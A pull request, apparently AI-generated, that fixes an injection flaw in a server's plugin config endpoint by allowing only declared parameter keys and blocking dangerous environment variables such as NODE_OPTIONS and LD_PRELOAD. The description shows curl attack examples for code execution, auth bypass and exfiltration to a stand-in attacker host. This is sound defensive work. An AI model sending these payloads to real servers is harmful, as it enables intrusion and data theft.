### PR TITLE
fix: restrict plugin config env writes to declared params

### DIFF
--- a/src/api/server.ts
+++ b/src/api/server.ts
@@ -2700,8 +2700,37 @@ async function handleRequest(
         return;
       }
 
+      // Only allow env vars declared in the plugin's parameter definitions.
+      // This prevents attackers from injecting arbitrary env vars like
+      // NODE_OPTIONS, LD_PRELOAD, PATH, etc. via the config endpoint.
+      const allowedParamKeys = new Set(plugin.parameters.map((p) => p.key));
+
+      // Defense-in-depth: block dangerous system env vars even if a plugin
+      // accidentally declares one of these as a parameter key.
+      const BLOCKED_ENV_KEYS = new Set([
+        "LD_PRELOAD",
+        "LD_LIBRARY_PATH",
+        "DYLD_INSERT_LIBRARIES",
+        "DYLD_LIBRARY_PATH",
+        "NODE_OPTIONS",
+        "NODE_EXTRA_CA_CERTS",
+        "ELECTRON_RUN_AS_NODE",
+        "PATH",
+        "HOME",
+        "SHELL",
+        "MILAIDY_API_TOKEN",
+        "DATABASE_URL",
+        "POSTGRES_URL",
+      ]);
+
       for (const [key, value] of Object.entries(body.config)) {
         if (typeof value === "string" && value.trim()) {
+          if (!allowedParamKeys.has(key)) {
+            continue; // silently skip keys not declared in plugin parameters
+          }
+          if (BLOCKED_ENV_KEYS.has(key.toUpperCase())) {
+            continue; // never allow dangerous system env vars
+          }
           process.env[key] = value;
         }
       }


### PR DESCRIPTION
## Summary
- **Vulnerability**: `PUT /api/plugins/:id` writes every key from `body.config` directly to `process.env` with zero restriction (line 2703-2706). An attacker can inject `NODE_OPTIONS=--require=/tmp/evil.js` (RCE), `LD_PRELOAD` (library injection), `PATH` (binary hijack), `DATABASE_URL` (data exfiltration), or `MILAIDY_API_TOKEN` (auth bypass).
- **Fix**: Only env vars declared in the plugin's own `parameters` definition are now written to `process.env`. A defense-in-depth blocklist prevents dangerous system vars (`LD_PRELOAD`, `NODE_OPTIONS`, `PATH`, `HOME`, `SHELL`, `DATABASE_URL`, `MILAIDY_API_TOKEN`, etc.) from being set even if a plugin accidentally declares them.
- **Impact**: Surgical 1-location change. Existing tests pass because `plugin-lifecycle.e2e.test.ts` already uses declared parameter keys.

## Attack examples blocked
```bash
# RCE via NODE_OPTIONS
curl -X PUT /api/plugins/anthropic -d '{"config":{"NODE_OPTIONS":"--require=/tmp/evil.js"}}'

# Auth bypass
curl -X PUT /api/plugins/anthropic -d '{"config":{"MILAIDY_API_TOKEN":""}}'

# Data exfiltration
curl -X PUT /api/plugins/anthropic -d '{"config":{"DATABASE_URL":"postgres://attacker.com/steal"}}'
```

## Test plan
- [x] TypeScript compiles cleanly (pre-existing errors unrelated)
- [x] Verified no collisions between blocklist and legitimate plugin param keys (only MCP plugin declares `PATH`, which should be inherited not user-set)
- [x] Existing `plugin-lifecycle.e2e.test.ts` uses declared param keys — unaffected
- [x] Other `process.env` writes in server.ts use server-controlled keys from lookup tables — unaffected

🤖 Generated with [Claude Code](https://claude.com/claude-code)